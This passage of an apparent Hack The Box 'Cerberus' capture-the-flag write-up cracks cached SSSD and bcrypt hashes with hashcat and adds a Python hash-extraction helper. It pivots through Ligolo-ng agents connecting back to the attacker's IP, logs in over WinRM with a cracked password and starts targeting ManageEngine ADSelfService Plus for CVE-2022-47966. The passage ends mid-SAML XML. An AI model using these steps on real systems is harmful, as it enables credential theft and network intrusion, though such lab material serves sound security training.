$6$6LP9gyiXJCovapcy$0qmZTTjp9f2A0e7n4xk0L6ZoeKhhaCNm0VGJnX/Mu608QkliMpIy1FwKZlyUJAZU3FZ3.GQ.4N6bb9pxE3t3T0
cachedPasswordType
lastCachedPasswordChange
1677672476
failedLoginAttempts
<--SNIP-->
<--SNIP-->

Let's crack the hash; the $6$ prefix is sha512crypt, hashcat mode 1800:

└─$ hashcat matthew.hash -m 1800 /home/anurag/stuff/rockyou.txt 
<--SNIP-->
<--SNIP-->
$6$6LP9gyiXJCovapcy$0qmZTTjp9f2A0e7n4xk0L6ZoeKhhaCNm0VGJnX/Mu608QkliMpIy1FwKZlyUJAZU3FZ3.GQ.4N6bb9pxE3t3T0:147258369
<--SNIP-->
<--SNIP-->
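SSSD stores the cached hash as an ordinary attribute value, and strings(1) prints attribute names and values on consecutive lines, so pulling every cached hash out of a large dump by hand is error-prone. The following Python is an added example, not part of the original write-up or of SSSD; it parses a constructed excerpt in the shape of the strings output above (the principal names other than matthew and all hash values are made up), keeps only name/cachedPassword pairs whose next line actually looks like a principal or a crypt(3) hash, and emits user:hash lines with the matching hashcat mode (1800 for the $6$ sha512crypt hash seen here):

```python
import re
from typing import Dict, List, Optional

# Constructed excerpt in the shape of `strings cache_<domain>.ldb` output.
# Attributes whose values are binary (cachedPasswordType here) leave no
# printable line behind them, so a naive "pair up lines" parser misaligns;
# the second entry also has no cachedPassword at all. Hashes are made up.
SAMPLE_STRINGS = """\
name
matthew@cerberus.local
objectCategory
user
uidNumber
1000
cachedPassword
$6$constructedSalt$constructedHashValue0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJ
cachedPasswordType
lastCachedPasswordChange
1677672476
name
svc_nologin@cerberus.local
objectCategory
user
cachedPasswordType
lastUpdate
1677672500
"""

CRYPT_HASH = re.compile(r"^\$(?P<id>[a-z0-9]+)\$[^\s]+$")
UPN = re.compile(r"^[^\s@]+@[^\s@]+$")

# hashcat modes for the crypt(3) ids SSSD can store; yescrypt ($y$) has no
# hashcat mode and is left for john.
HASHCAT_MODES = {"1": 500, "5": 7400, "6": 1800}


def parse_sssd_strings(text: str) -> Dict[str, str]:
    """Map user principal -> cachedPassword hash from strings(1) output.

    A value is only accepted when the line after the attribute name looks
    like what that attribute should hold, which is what keeps the parser
    aligned across attributes that printed no value."""
    lines = [ln.strip() for ln in text.splitlines()]
    found: Dict[str, str] = {}
    current_user: Optional[str] = None
    for i in range(len(lines) - 1):
        nxt = lines[i + 1]
        if lines[i] == "name" and UPN.match(nxt):
            current_user = nxt
        elif lines[i] == "cachedPassword" and CRYPT_HASH.match(nxt):
            if current_user is not None:
                found[current_user] = nxt
    return found


def hashcat_mode(hash_value: str) -> Optional[int]:
    """hashcat -m value for a crypt(3) hash, or None if hashcat has no mode."""
    m = CRYPT_HASH.match(hash_value)
    return HASHCAT_MODES.get(m.group("id")) if m else None


def hashcat_lines(entries: Dict[str, str]) -> List[str]:
    """user:hash lines for `hashcat --username -m <mode>`; hashcat takes one
    mode per run, so group by hashcat_mode() before writing the file."""
    return [f"{user}:{h}" for user, h in entries.items()]


if __name__ == "__main__":
    entries = parse_sssd_strings(SAMPLE_STRINGS)
    for line in hashcat_lines(entries):
        print(line, "-> -m", hashcat_mode(line.split(":", 1)[1]))
```

Running it against a real dump means `strings /var/lib/sss/db/cache_<domain>.ldb` piped into `parse_sssd_strings`; the same ldb also holds other accounts that have logged in, so a domain-joined Linux host with cached credentials is worth checking for every user, not just the one you already know about.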

Let's set up ligolo-ng for pivoting. The proxy runs on our box and the agent on icinga connects back to it (agent -connect 10.10.16.7:11601 -ignore-cert, since the proxy uses a self-signed certificate):

└─$ sudo ./proxy -selfcert
[sudo] password for anurag: 
WARN[0000] Using default selfcert domain 'ligolo', beware of CTI, SOC and IoC! 
WARN[0000] Using self-signed certificates               
WARN[0000] TLS Certificate fingerprint for ligolo is: B857F3D462BA49E017C3E07C1D91848D2B71319F8CFB9210533C9B6D85F7D8E0 
INFO[0000] Listening on 0.0.0.0:11601                   
    __    _             __                       
   / /   (_)___ _____  / /___        ____  ____ _
  / /   / / __ `/ __ \/ / __ \______/ __ \/ __ `/
 / /___/ / /_/ / /_/ / / /_/ /_____/ / / / /_/ / 
/_____/_/\__, /\____/_/\____/     /_/ /_/\__, /  
        /____/                          /____/   

  Made in France ♥            by @Nicocha30!
  Version: 0.7.5

ligolo-ng » INFO[0028] Agent joined.                                 id=aa50efd9-2fae-436e-bb4c-a2a1802c0041 name=www-data@icinga remote="10.10.11.205:49812"
ligolo-ng » 
ligolo-ng » session 
? Specify a session : 1 - www-data@icinga - 10.10.11.205:49812 - aa50efd9-2fae-436e-bb4c-a2a1802c0041                             
[Agent : www-data@icinga] » ifconfig 
┌────────────────────────────────────┐
│ Interface 0                        │
├──────────────┬─────────────────────┤
│ Name         │ lo                  │
│ Hardware MAC │                     │
│ MTU          │ 65536               │
│ Flags        │ up|loopback|running │
│ IPv4 Address │ 127.0.0.1/8         │
│ IPv6 Address │ ::1/128             │
└──────────────┴─────────────────────┘
┌───────────────────────────────────────────────┐
│ Interface 1                                   │
├──────────────┬────────────────────────────────┤
│ Name         │ eth0                           │
│ Hardware MAC │ 00:15:5d:5f:e8:01              │
│ MTU          │ 1500                           │
│ Flags        │ up|broadcast|multicast|running │
│ IPv4 Address │ 172.16.22.2/28                 │
│ IPv6 Address │ fe80::215:5dff:fe5f:e801/64    │
└──────────────┴────────────────────────────────┘
[Agent : www-data@icinga] » interface_create --name ligolo
INFO[0046] Creating a new "ligolo" interface...         
INFO[0046] Interface created!                           
[Agent : www-data@icinga] » interface_add_route --name ligolo --route 172.16.22.0/28
INFO[0058] Route created.  
[Agent : www-data@icinga] » start
[Agent : www-data@icinga] » INFO[0068] Starting tunnel to www-data@icinga (aa50efd9-2fae-436e-bb4c-a2a1802c0041) 

And we can ping the DC from our own box through the tunnel:

└─$ ping 172.16.22.1 
PING 172.16.22.1 (172.16.22.1) 56(84) bytes of data.
64 bytes from 172.16.22.1: icmp_seq=1 ttl=64 time=1123 ms
64 bytes from 172.16.22.1: icmp_seq=2 ttl=64 time=399 ms
^C
--- 172.16.22.1 ping statistics ---
3 packets transmitted, 2 received, 33.3333% packet loss, time 2029ms
rtt min/avg/max/mdev = 399.202/761.326/1123.450/362.124 ms, pipe 2

Now we can WinRM in as matthew with the cracked password and get user.txt:

└─$ evil-winrm -i 172.16.22.1 -u matthew -p 147258369
                                        
Evil-WinRM shell v3.7
                                        
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
                                        
Data: For more information, check Evil-WinRM GitHub: <https://github.com/Hackplayers/evil-winrm#Remote-path-completion>
                                        
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\matthew\Documents> cd ..\Desktop
*Evil-WinRM* PS C:\Users\matthew\Desktop> dir

    Directory: C:\Users\matthew\Desktop

Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-ar---        8/13/2025   2:45 AM             34 user.txt

Privilege Escalation

Shell as ?

Backup file on ADSelf

We found backup files in the ADSelfService Plus install directory:

*Evil-WinRM* PS C:\Program Files (x86)> dir "ManageEngine\ADSelfService Plus\Backup"

    Directory: C:\Program Files (x86)\ManageEngine\ADSelfService Plus\Backup

Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-a----        5/16/2025  10:14 PM         636500 250516-221358.ezip
-a----        2/15/2023   7:16 AM         320225 OfflineBackup_20230214064809.ezip

*Evil-WinRM* PS C:\Program Files (x86)> 

Let’s download and analyse them.

Both files are password-protected archives:

└─$ file 250516-221358.ezip
250516-221358.ezip: Zip archive data, made by v6.3, extract using at least v5.1, last modified May 16 2025 22:14:06, uncompressed size 82, method=AES Encrypted
                                                                                                                                                                                                                                                                              
┌──(anurag㉿anurag)-[~/htb/Cerberus/loot]
└─$ 7z x OfflineBackup_20230214064809.ezip

7-Zip 24.09 (x64) : Copyright (c) 1999-2024 Igor Pavlov : 2024-11-29
 64-bit locale=C.UTF-8 Threads:3 OPEN_MAX:1024, ASM

Scanning the drive for archives:
1 file, 320225 bytes (313 KiB)

Extracting archive: OfflineBackup_20230214064809.ezip
--
Path = OfflineBackup_20230214064809.ezip
Type = 7z
Physical Size = 320225
Headers Size = 8337
Method = LZMA2:3m 7zAES
Solid = +
Blocks = 1

    
Enter password (will not be echoed):

The ManageEngine documentation describes the default backup password as the reverse string of the filename (for the filename mentioned in their example, the password would be 7451-422180).

Let’s try it out. Since 7z can list the archive contents without the password, we first list the files in OfflineBackup_20230214064809.ezip:

└─$ 7z l OfflineBackup_20230214064809.ezip

7-Zip 24.09 (x64) : Copyright (c) 1999-2024 Igor Pavlov : 2024-11-29
 64-bit locale=C.UTF-8 Threads:3 OPEN_MAX:1024, ASM

Scanning the drive for archives:
1 file, 320225 bytes (313 KiB)

Listing archive: OfflineBackup_20230214064809.ezip

--
Path = OfflineBackup_20230214064809.ezip
Type = 7z
Physical Size = 320225
Headers Size = 8337
Method = LZMA2:3m 7zAES
Solid = +
Blocks = 1

   Date      Time    Attr         Size   Compressed  Name
------------------- ----- ------------ ------------  ------------------------
2023-02-14 20:18:39 ....A            0            0  AAARadiusConfig.txt
2023-02-14 20:18:39 ....A            0            0  AAARememberMeInfo.txt
2023-02-14 20:18:39 ....A            0            0  ADMPDomainGroupRoleMapping.txt
2023-02-14 20:18:40 ....A            0            0  ADSADComputerGeneralDetails.txt
2023-02-14 20:18:40 ....A            0            0  ADSADContactGeneralDetails.txt
2023-02-14 20:18:40 ....A            0            0  ADSADGroupGeneralDetails.txt
2023-02-14 20:18:40 ....A            0            0  ADSADOUGeneralDetails.txt
2023-02-14 20:18:40 ....A            0            0  ADSADSyncAudit.txt
2023-02-14 20:18:40 ....A            0            0  ADSADSyncMultiDCResults.txt
2023-02-14 20:18:44 ....A            0            0  ADSADSyncMultiDCResultsAudit.txt
<--SNIP-->
<--SNIP-->
└─$ echo "OfflineBackup_20230214064809" | rev
90846041203202_pukcaBenilffO

Inside the extracted backup we find a hash.txt:

└─$ cat hash.txt                           
$2a$12$IkmRrMCQ6KAuzaMTp4DMxeu0XGpLKuXbz2JMbLVG3gCYTg/JPlE9q

Let’s crack it with hashcat (mode 3200 is bcrypt):

└─$ hashcat hash.txt -m 3200 /home/anurag/stuff/rockyou.txt         
hashcat (v6.2.6) starting

<--SNIP-->

$2a$12$IkmRrMCQ6KAuzaMTp4DMxeu0XGpLKuXbz2JMbLVG3gCYTg/JPlE9q:spongebob1

<--SNIP-->

Now I need to find the user for it. Unfortunately, no user matched the password.

After that, I decided to look for open ports:

└─$ nmap -sT -p- --min-rate 10000 171.16.22.1 -Pn
Starting Nmap 7.95 ( <https://nmap.org> ) at 2025-08-14 17:56 IST
Nmap scan report for 171.16.22.1
Host is up.
All 65535 scanned ports on 171.16.22.1 are in ignored states.
Not shown: 65535 filtered tcp ports (no-response)

Nmap done: 1 IP address (1 host up) scanned in 143.23 seconds

But strangely, all the ports came back in an ignored state, even though we know the WinRM port is open (maybe a firewall or some filtering is in place?).

After doing some digging I found out why WinRM works only via the Linux jump host (172.16.22.2).

Finding

  • Windows Firewall inbound rules for WinRM (TCP 5985) explicitly allow connections only from 172.16.22.2/32.

  • The generic Allow Ports rule does allow 172.16.22.1 and 172.16.22.2, but it does not include port 5985 in its LocalPort list.

  • Result:

    • From attacker host directly → source IP not allowed for WinRM → packet silently dropped (filtered in Nmap).

    • From Linux jump host (172.16.22.2) via Ligolo-ng → source IP matches allowed rule → WinRM connection succeeds.

Scripts Used

1. firewall_rule.ps1 – Display all rules with key fields:

netsh advfirewall firewall show rule name=all | Select-String "^Rule Name" -Context 0,12 | ForEach-Object {
    $c = $_.Context.PostContext
    # Pick each field by name instead of by line index: netsh prints a dashed separator right
    # after "Rule Name", so positional indexing shifts every column by one
    $field = { param($name) (($c | Where-Object { $_ -match "^$name\s*:" }) -split ":\s*", 2)[1] }
    [pscustomobject]@{
        'Rule Name' = ($_.Line -split ":\s*", 2)[1]
        'Enabled'   = & $field 'Enabled'
        'Direction' = & $field 'Direction'
        'Action'    = & $field 'Action'
        'Protocol'  = & $field 'Protocol'
        'LocalPort' = & $field 'LocalPort'
        'RemoteIP'  = & $field 'RemoteIP'
    }
} | Format-Table -AutoSize

Output excerpt:

Rule Name                                   Enabled Direction Action Protocol LocalPort RemoteIP
---------                                   ------- --------- ------ -------- --------- --------
Windows Remote Management (HTTP-In)        Yes     Inbound   Allow  TCP      5985      172.16.22.2/32
Windows Remote Management (HTTP-In)        Yes     Inbound   Allow  TCP      5985      172.16.22.2/32
Allow Ports                                 Yes     Inbound   Allow  TCP      53,80,... 172.16.22.1/32,172.16.22.2/32

2. Remote_IP_restriction.ps1 – List only rules with RemoteIP restrictions:

netsh advfirewall firewall show rule name=all verbose | Select-String "^Rule Name" -Context 0,15 | ForEach-Object {
    $c = $_.Context.PostContext
    # Keep only rules whose RemoteIP is something other than "Any"
    $remoteIP = ($c | Where-Object { $_ -match "^RemoteIP" }) -replace "RemoteIP:\s*", ""
    if ($remoteIP -and $remoteIP -ne "Any") {
        [pscustomobject]@{
            'Rule Name' = ($_.Line -replace "Rule Name:\s*", "").Trim()
            'RemoteIP'  = $remoteIP.Trim()
        }
    }
} | Format-Table -AutoSize

Output excerpt:

Rule Name                                   RemoteIP
---------                                   --------
Windows Remote Management (HTTP-In)         172.16.22.2/32
Windows Remote Management (HTTP-In)         172.16.22.2/32
Allow Ports                                  172.16.22.1/32,172.16.22.2/32

3. Detailed check of Allow Ports rule:

netsh advfirewall firewall show rule name="Allow Ports" verbose

Output excerpt:

LocalPort: 53,80,443,88,135,139,389,445,464,593,636,2179,3268,3269,5357,9389,49667-60000
RemoteIP:  172.16.22.1/32,172.16.22.2/32

No 5985 in the LocalPort list → rule does not apply to WinRM.

Conclusion

  • WinRM access is strictly restricted to the Linux jump host’s IP (172.16.22.2).

  • Generic allow rule for 172.16.22.1 doesn’t help because 5985 is excluded.

  • Pivoting through 172.16.22.2 is the only way to reach WinRM.
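To check this kind of restriction offline, here is an added Python example (my own, not part of the writeup and not one of the PowerShell scripts above) that parses `netsh advfirewall firewall show rule` output by field name and answers which enabled inbound Allow rules admit a given TCP port from a given source address. The netsh text embedded in it is a constructed sample that mirrors the two rules found on the DC, and all function names are my own.

```python
import ipaddress

# Constructed sample of `netsh advfirewall firewall show rule name=all` output, in the field
# order netsh prints them; the values mirror the two rules discussed above.
SAMPLE_NETSH = """\
Rule Name:                            Windows Remote Management (HTTP-In)
----------------------------------------------------------------------
Enabled:                              Yes
Direction:                            In
Grouping:                             Windows Remote Management
LocalIP:                              Any
RemoteIP:                             172.16.22.2/32
Protocol:                             TCP
LocalPort:                            5985
Action:                               Allow

Rule Name:                            Allow Ports
----------------------------------------------------------------------
Enabled:                              Yes
Direction:                            In
Grouping:
LocalIP:                              Any
RemoteIP:                             172.16.22.1/32,172.16.22.2/32
Protocol:                             TCP
LocalPort:                            53,80,443,88,135,139,389,445,464,593,636,2179,3268,3269,5357,9389,49667-60000
Action:                               Allow
"""


def parse_netsh_rules(text):
    """Turn netsh's 'Field: value' blocks into one dict per rule, keyed by field name
    rather than by line position (positional parsing breaks as soon as a field moves)."""
    rules, current = [], None
    for line in text.splitlines():
        if line.startswith("Rule Name:"):
            current = {}
            rules.append(current)
        if current is None or ":" not in line:   # skips the dashed separator line
            continue
        key, _, value = line.partition(":")
        current[key.strip()] = value.strip()
    return rules


def port_matches(port, local_port_field):
    """LocalPort is 'Any', a comma list of ports, or ranges such as 49667-60000."""
    if local_port_field == "Any":
        return True
    for item in local_port_field.split(","):
        item = item.strip()
        if "-" in item:
            lo, hi = (int(x) for x in item.split("-", 1))
            if lo <= port <= hi:
                return True
        elif item.isdigit() and int(item) == port:
            return True
    return False


def remote_ip_matches(source_ip, remote_ip_field, local_subnet=None):
    """RemoteIP is 'Any', 'LocalSubnet', CIDR prefixes or a.b.c.d-e.f.g.h ranges, comma separated.
    local_subnet is the prefix 'LocalSubnet' should expand to (the host's own subnet)."""
    src = ipaddress.ip_address(source_ip)
    for item in remote_ip_field.split(","):
        item = item.strip()
        if item == "Any":
            return True
        if item == "LocalSubnet":
            if local_subnet and src in ipaddress.ip_network(local_subnet, strict=False):
                return True
        elif "-" in item:
            lo, hi = (ipaddress.ip_address(x) for x in item.split("-", 1))
            if lo <= src <= hi:
                return True
        elif src in ipaddress.ip_network(item, strict=False):
            return True
    return False


def allowing_rules(rules, port, source_ip, protocol="TCP", local_subnet=None):
    """Names of enabled inbound Allow rules that admit protocol/port from source_ip.
    An empty list means no rule admits the packet, which Nmap reports as 'filtered'."""
    return [
        r["Rule Name"] for r in rules
        if r.get("Enabled") == "Yes" and r.get("Direction") == "In" and r.get("Action") == "Allow"
        and r.get("Protocol", "Any") in ("Any", protocol)
        and port_matches(port, r.get("LocalPort", "Any"))
        and remote_ip_matches(source_ip, r.get("RemoteIP", "Any"), local_subnet)
    ]


if __name__ == "__main__":
    table = parse_netsh_rules(SAMPLE_NETSH)
    for src in ("172.16.22.2", "172.16.22.1", "10.10.16.7"):
        print(f"TCP/5985 from {src}: {allowing_rules(table, 5985, src) or 'no allow rule, dropped'}")
```

Two caveats on the model: Windows evaluates Block rules before Allow rules and also filters on profile and LocalIP, none of which this script considers, so read its result as "is there any Allow rule at all for this port and source", which is exactly the question the filtered Nmap result raised. Feed it real output by saving `netsh advfirewall firewall show rule name=all` to a file and calling `parse_netsh_rules` on its contents.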

Double Pivot to access all ports

We need to put the Ligolo-ng agent on the Windows server as well, because right now:

  • My Kali → Linux pivot (172.16.22.2) → Windows server

  • Windows firewall limits WinRM to only 172.16.22.2, so it works, but other ports may be restricted to other IPs or LocalSubnet.

  • From Kali, our Nmap scans are limited to what 172.16.22.2 is allowed to see.

So if I double pivot:

[ My Kali ] 
     ↓ (Ligolo)
[ Linux Jump Host: 172.16.22.2 ]
     ↓ (Ligolo)
[ Windows Server ]

[ Rest of Internal Network ]

Double Pivot

*Evil-WinRM* PS C:\temp> .\agent.exe -connect 10.10.16.7:11601 -ignore-cert
agent.exe : time="2025-08-14T07:47:04-07:00" level=warning msg="warning, certificate validation disabled"
    + CategoryInfo          : NotSpecified: (time="2025-08-1...ation disabled":String) [], RemoteException
    + FullyQualifiedErrorId : NativeCommandError
time="2025-08-14T07:47:04-07:00" level=info msg="Connection established" addr="10.10.16.7:11601"

Kali already knows 172.16.22.0/28 via the first tunnel, but a more specific /32 route to 172.16.22.1 will override it in the routing table (longest-prefix match wins).

This forces all DC traffic through the second tunnel, so from the DC’s perspective the connections originate locally, which bypasses the firewall rules that block the Kali IP.
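The route-selection rule behind this, as an added Python example (mine, not from the writeup or from Ligolo-ng; the table, class and function names are constructed here): longest-prefix match picks the /32 over the /28 for the DC while the rest of the /28 keeps using the first tunnel, and adding a prefix that already exists is rejected, which is what Ligolo reported as `error: file exists` when the /28 was added a second time.

```python
import ipaddress


class RouteExists(Exception):
    """Raised when the same prefix is added twice (Ligolo-ng reports this as 'error: file exists')."""


def add_route(table, prefix, interface):
    """Append (network, interface) to the table; an identical prefix on any interface is rejected."""
    net = ipaddress.ip_network(prefix, strict=False)
    if any(existing == net for existing, _ in table):
        raise RouteExists(f"{net} is already routed")
    table.append((net, interface))
    return table


def select_route(table, destination):
    """Longest-prefix match: among routes containing the destination, the most specific wins."""
    dst = ipaddress.ip_address(destination)
    matches = [(net, iface) for net, iface in table if dst in net]
    if not matches:
        return None
    return max(matches, key=lambda m: m[0].prefixlen)[1]


def build_double_pivot_table():
    """Constructed replay of the interface_add_route calls made in the two Ligolo sessions."""
    table = add_route([], "172.16.22.0/28", "ligolo")      # first tunnel, via the Linux host
    try:
        add_route(table, "172.16.22.0/28", "ligolo1")      # rejected, just as Ligolo rejected it
    except RouteExists:
        pass
    add_route(table, "172.16.22.1/32", "ligolo1")          # the DC alone, via the second tunnel
    return table


if __name__ == "__main__":
    table = build_double_pivot_table()
    for dst in ("172.16.22.1", "172.16.22.2", "10.10.11.205"):
        print(f"{dst} -> {select_route(table, dst)}")
```

The same logic applies to the real kernel routing table on Kali, which is why no route needs to be removed: the /32 simply takes precedence for the one host it covers.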

[Agent : www-data@icinga] » INFO[0044] Agent joined.                                 id=86bb7c5e-1850-45fe-9fb3-4f1e82a11f7f name="CERBERUS\\matthew@DC" remote="10.10.11.205:49524"
[Agent : www-data@icinga] » 
[Agent : www-data@icinga] » session 
? Specify a session : 2 - CERBERUS\matthew@DC - 10.10.11.205:49524 - 86bb7c5e-1850-45fe-9fb3-4f1e82a11f7f
[Agent : CERBERUS\matthew@DC] » interface_create --name ligolo1
INFO[0158] Creating a new "ligolo1" interface...        
INFO[0158] Interface created!                           
[Agent : CERBERUS\matthew@DC] » ifconfig 
┌───────────────────────────────────────────────┐
│ Interface 0                                   │
├──────────────┬────────────────────────────────┤
│ Name         │ vEthernet (Switch1)            │
│ Hardware MAC │ 00:15:5d:5f:e8:00              │
│ MTU          │ 1500                           │
│ Flags        │ up|broadcast|multicast|running │
│ IPv6 Address │ fe80::e225:edaa:5112:dfc3/64   │
│ IPv4 Address │ 172.16.22.1/28                 │
└──────────────┴────────────────────────────────┘
┌─────────────────────────────────────────────────┐
│ Interface 1                                     │
├──────────────┬──────────────────────────────────┤
│ Name         │ Ethernet0 3                      │
│ Hardware MAC │ 00:50:56:b0:70:81                │
│ MTU          │ 1500                             │
│ Flags        │ up|broadcast|multicast|running   │
│ IPv6 Address │ dead:beef::18/128                │
│ IPv6 Address │ dead:beef::d5b6:1a82:ed83:740/64 │
│ IPv6 Address │ fe80::9aa1:6bb4:769a:899d/64     │
│ IPv4 Address │ 10.10.11.205/24                  │
└──────────────┴──────────────────────────────────┘
┌──────────────────────────────────────────────┐
│ Interface 2                                  │
├──────────────┬───────────────────────────────┤
│ Name         │ Loopback Pseudo-Interface 1   │
│ Hardware MAC │                               │
│ MTU          │ -1                            │
│ Flags        │ up|loopback|multicast|running │
│ IPv6 Address │ ::1/128                       │
│ IPv4 Address │ 127.0.0.1/8                   │
└──────────────┴───────────────────────────────┘
[Agent : CERBERUS\matthew@DC] » interface_add_route --name ligolo1 --route 172.16.22.0/28
error: file exists
[Agent : CERBERUS\matthew@DC] » interface_add_route --name ligolo1 --route 172.16.22.1/32
INFO[0509] Route created.                               
[Agent : CERBERUS\matthew@DC] » start --tun ligolo1
[Agent : CERBERUS\matthew@DC] » INFO[0565] Starting tunnel to CERBERUS\matthew@DC (86bb7c5e-1850-45fe-9fb3-4f1e82a11f7f) 

CVE-2022-47966

We can see an internal port 9251 listening:

*Evil-WinRM* PS C:\Users\matthew\Documents> netstat -ano -p TCP | findstr LISTENING
<--SNIP-->
  TCP    0.0.0.0:9251           0.0.0.0:0              LISTENING       5548
<--SNIP-->

But my Nmap result says it’s filtered, while nc says otherwise:

┌──(anurag㉿anurag)-[~/htb/Cerberus]
└─$ nmap -sT -p 9251 172.16.22.1
Starting Nmap 7.95 ( <https://nmap.org> ) at 2025-08-14 23:12 IST
Nmap scan report for dc.cerberus.local (172.16.22.1)
Host is up (0.00029s latency).

PORT     STATE    SERVICE
9251/tcp filtered unknown

Nmap done: 1 IP address (1 host up) scanned in 0.37 seconds
                                                                                                                                                                                                                                                                              
┌──(anurag㉿anurag)-[~/htb/Cerberus]
└─$ nc -v 172.16.22.1 9251
dc.cerberus.local [172.16.22.1] 9251 (?) open
                                                                                                                                                                                                                                                                              
┌──(anurag㉿anurag)-[~/htb/Cerberus]
└─$ nmap -sT -Pn -p 9251 --reason -v 172.16.22.1
Starting Nmap 7.95 ( <https://nmap.org> ) at 2025-08-14 23:16 IST
Initiating Connect Scan at 23:16
Scanning dc.cerberus.local (172.16.22.1) [1 port]
Discovered open port 9251/tcp on 172.16.22.1
Completed Connect Scan at 23:16, 0.89s elapsed (1 total ports)
Nmap scan report for dc.cerberus.local (172.16.22.1)
Host is up, received user-set (0.89s latency).

PORT     STATE SERVICE REASON
9251/tcp open  unknown syn-ack

Read data files from: /usr/share/nmap
Nmap done: 1 IP address (1 host up) scanned in 0.92 seconds                                                     
└─$ nmap -sC -sV -Pn -p 9251 --reason -v 172.16.22.1
Starting Nmap 7.95 ( <https://nmap.org> ) at 2025-08-14 23:18 IST
NSE: Loaded 157 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 23:18
Completed NSE at 23:18, 0.00s elapsed
Initiating NSE at 23:18
Completed NSE at 23:18, 0.00s elapsed
Initiating NSE at 23:18
Completed NSE at 23:18, 0.00s elapsed
Initiating SYN Stealth Scan at 23:18
Scanning dc.cerberus.local (172.16.22.1) [1 port]
Discovered open port 9251/tcp on 172.16.22.1
Completed SYN Stealth Scan at 23:18, 0.33s elapsed (1 total ports)
Initiating Service scan at 23:18
Scanning 1 service on dc.cerberus.local (172.16.22.1)
Completed Service scan at 23:19, 42.44s elapsed (1 service on 1 host)
NSE: Script scanning 172.16.22.1.
Initiating NSE at 23:19
Completed NSE at 23:19, 19.93s elapsed
Initiating NSE at 23:19
Completed NSE at 23:19, 4.50s elapsed
Initiating NSE at 23:19
Completed NSE at 23:19, 0.00s elapsed
Nmap scan report for dc.cerberus.local (172.16.22.1)
Host is up, received user-set (0.32s latency).

PORT     STATE SERVICE  REASON         VERSION
9251/tcp open  ssl/http syn-ack ttl 64 Apache Tomcat (language: en)
|_http-favicon: Unknown favicon MD5: D41D8CD98F00B204E9800998ECF8427E
| ssl-cert: Subject: commonName=cerberus.local/organizationName=CE/stateOrProvinceName=Dorset/countryName=UK
| Subject Alternative Name: DNS:cerberus.local
| Issuer: commonName=ManageEngine ADSelfService Plus/organizationName=ManageEngine Zoho Corporation/stateOrProvinceName=CA/countryName=US
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2023-01-29T19:26:48
| Not valid after:  2043-01-23T19:26:48
| MD5:   520f:7c21:072a:787b:d574:0d10:94ae:11ff
|_SHA-1: 56a4:c917:2b7a:0fad:79b7:390a:affb:bfcf:8a6a:dade
|_http-title: Site doesn't have a title (text/html;charset=UTF-8).
|_ssl-date: 2025-08-13T17:49:32+00:00; -1d00h00m05s from scanner time.
| http-methods: 
|_  Supported Methods: GET POST

Host script results:
|_clock-skew: -1d00h00m05s

NSE: Script Post-scanning.
Initiating NSE at 23:19
Completed NSE at 23:19, 0.00s elapsed
Initiating NSE at 23:19
Completed NSE at 23:19, 0.00s elapsed
Initiating NSE at 23:19
Completed NSE at 23:19, 0.00s elapsed
Read data files from: /usr/share/nmap
Service detection performed. Please report any incorrect results at <https://nmap.org/submit/> .
Nmap done: 1 IP address (1 host up) scanned in 68.42 seconds
           Raw packets sent: 1 (44B) | Rcvd: 12 (2.396KB)

We can see the ADSelfService Plus sign-in page.

Searchsploit shows an unauthenticated RCE for builds prior to 6003:

└─$ searchsploit adself                        
-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                                                                                                                                                                                              |  Path
-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
ManageEngine ADSelfService Build prior to 6003 - Remote Code Execution (Unauthenticated)                                                                                                                                                    | java/webapps/48739.txt
ManageEngine ADSelfService Plus 4.4 - 'EmployeeSearch.cc' Multiple Cross-Site Scripting Vulnerabilities                                                                                                                                     | php/webapps/35331.txt
ManageEngine ADSelfService Plus 4.4 - POST Manipulation Security Question                                                                                                                                                                   | php/webapps/35330.txt
ManageEngine ADSelfService Plus 6.1 - CSV Injection                                                                                                                                                                                         | multiple/webapps/49885.py
ManageEngine ADSelfService Plus 6.1 - User Enumeration                                                                                                                                                                                      | windows/remote/50873.py
ManageEngine ADSelfService Plus Build 6118 - NTLMv2 Hash Exposure                                                                                                                                                                           | windows/remote/50904.py
ZOHO ManageEngine ADSelfService Plus 4.5 Build 4521 - Cross-Site Scripting                                                                                                                                                                  | php/webapps/36316.txt
Zoho ManageEngine ADSelfService Plus 5.7 < 5702 build - Cross-Site Scripting                                                                                                                                                                | php/webapps/46815.txt
-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
                                                                                                                                                                                                                                                                             

In our case, the build is 6210:

┌──(anurag㉿anurag)-[~/htb/Cerberus]
└─$ curl -X POST -s -k https://172.16.22.1:9251/servlet/GetProductVersion | jq .
{
  "DB_TYPE": "postgres",
  "BUILD_NUMBER": "6210",
  "BUILD_ARCHITECTURE": "64",
  "RUNNING_AS_SERVICE": true,
  "HA_SUPPORTED": "true",
  "PRODUCT_SEQ_NO": "ADSSP-4-DSFJGWB8-1094274869000",
  "PRODUCT_NAME": "ManageEngine ADSelfService Plus",
  "IS_BUNDLED_DB": "true",
  "INSTALLED_AS_SERVICE": true,
  "PRODUCT_VERSION": "6.2",
  "SERVICE_ACCOUNT_PRIVILEGED": false
}

We found the Metasploit module exploit/multi/http/manageengine_adselfservice_plus_saml_rce_cve_2022_47966.

We need a GUID, and there are two ways to get it:

  1. The URL above does have useful information. The two parameters passed are SAMLRequest and RelayState. Both appear to be URL encoded base64.

    If I URL decode the SAMLRequest (online tools like urldecoder.org or Burp Decoder will work), and then pass them to a SAML decoder such as this one on samltool.com, it generates XML:

    <?xml version="1.0" encoding="UTF-8"?>
    <saml2p:AuthnRequest AssertionConsumerServiceURL="https://DC:9251/samlLogin/67a8d101690402dc6a6744b8fc8a7ca1acf88b2f"
                         Destination="https://dc.cerberus.local/adfs/ls/"
                         ID="_68c55db128eef523034f50338a7aa6db"
                         IssueInstant="2025-08-13T17:48:23.120Z"
                         ProtocolBinding="urn:oasis:names:tc:SAML:2.0:bindings:HTTP-POST"
                         ProviderName="ManageEngine ADSelfService Plus"
